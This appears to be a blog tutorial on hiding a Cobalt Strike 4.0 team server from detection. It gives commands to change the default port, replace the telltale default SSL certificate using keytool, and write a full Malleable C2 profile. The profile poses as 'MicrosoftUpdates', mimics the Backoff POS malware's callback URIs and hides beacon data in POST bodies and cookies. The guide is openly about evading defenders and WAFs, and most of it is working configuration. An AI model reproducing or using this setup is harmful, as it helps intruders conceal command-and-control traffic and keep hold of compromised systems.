Hiding skills of CobaltStrike server

Keywords: Windows security

catalogue

Introduction:  

1, Modify default port

2, Replace SSL certificate

3, Modify C2.profile file

Create and modify C2 profile file:

4, Run the teamserver file server and go online

 

Introduction:  

Many tools have their own characteristics, such as sqlmap, awvs and other scanners, which can be easily removed by waf ban when scanning; Or because they didn't hide their own characteristics, they were online.

Here, we mainly hide our own characteristics from three aspects: modifying the default port, replacing the SSL certificate and modifying the C2.profile file.

Here I use the version of cobalt strike 4.0

1, Modify default port

vim teamserver

On the last line of the file; The default port is 50050; It can be modified to any port according to the situation.

I changed it here to 10000

2, Replace SSL certificate

keytool is a Java data certificate and key management tool.

Keytool stores keys and certificates in a file called keystore, that is, the store suffix file.

#Command

 - certreq             Generate certificate request
 - changealias         Change the alias of an entry
 - delete              Delete entry
 - exportcert          Export certificate
 - genkeypair          Generate key pair
 - genseckey           Generate key
 - gencert             Generate certificate based on certificate request
 - importcert          Import certificate or certificate chain
 - importpass          Import password
 - importkeystore      Import one or all entries from another keystore
 - keypasswd           Change key password for entry
 - list                List entries in the keystore
 - printcert           Print certificate content
 - printcertreq        Print the contents of the certificate request
 - printcrl            Print the contents of the CRL file
 - storepasswd         Change the password stored in the keystore

View Certificate:

keytool -list -v -keystore cobaltstrike.store

The default password is 123456

You can see that the owner of the alias and certificate contains some characteristics of CS.

The default is:

CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, ST=Cyberspace, C=Earth

Here is a modification; Generate a new certificate file from:

keytool -genkey -alias ling -keyalg RSA -validity 36500 -keystore ling.store

View Certificate:

keytool -list -v -keystore ling.store

  Load certificate file:

keytool -importkeystore -srckeystore ./ling.store -destkeystore ./ling.store -deststoretype pkcs12

3, Modify C2.profile file

Create and modify C2 profile file:

vi c2.profile

#The file name is optional

set keystore
set password
set alias
set sample_name "C2 POS Malware";
set sleeptime "5000"; # use a ~30s delay between callbacks
set jitter "10"; # throw in a 10% jitter
set useragent "Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101
Firefox/24.0";
#Set certificate
https-certificate {
set CN "US";
set O "MicrosoftUpdates";
set C "en";
set L "US";
set OU "MicrosoftUpdates";
set ST "US";
set validity "365";
}#set up
code-signer{
set keystore "ling.store";
set password "159357";
set alias "ling";
}#Specify the IP address when DNS beacon is not used
set dns_idle "8.8.4.4";
#Force sleep time before each individual DNS request
set dns_sleep "0";
#Maximum length of host name when uploading data through DNS [0-255]
set maxdns "235";
http-post {
set uri "/windebug/updcheck.php /aircanada/dark.php /aero2/fly.php
/windowsxp/updcheck.php /hello/flash.php";
client {
header "Accept" "text/plain";
header "Accept-Language" "en-us";
header "Accept-Encoding" "text/plain";
header "Content-Type" "application/x-www-form-urlencoded";
id {
netbios;
parameter "id";
}
output {
base64;
prepend "&op=1&id=vxeykS&ui=Josh @
PC&wv=11&gr=backoff&bv=1.55&data=";
print;
} }
server {
output {
print;
} } }
http-get {
set uri "/updates";
client {
metadata {
netbiosu;
prepend "user=";
header "Cookie";
} }
server {
header "Content-Type" "text/plain";
output {
base64;
print;
} } }

  c2lint checks whether the configuration file can pass

./c2lint c2.profile

 

 

If the operation fails, a red exception code will appear

4, Run the teamserver file server and go online

./teamserver 192.168.100.142 123123 ling.store

 

Successfully entered.

 

Posted by shaitan on Wed, 17 Nov 2021 20:52:28 -0800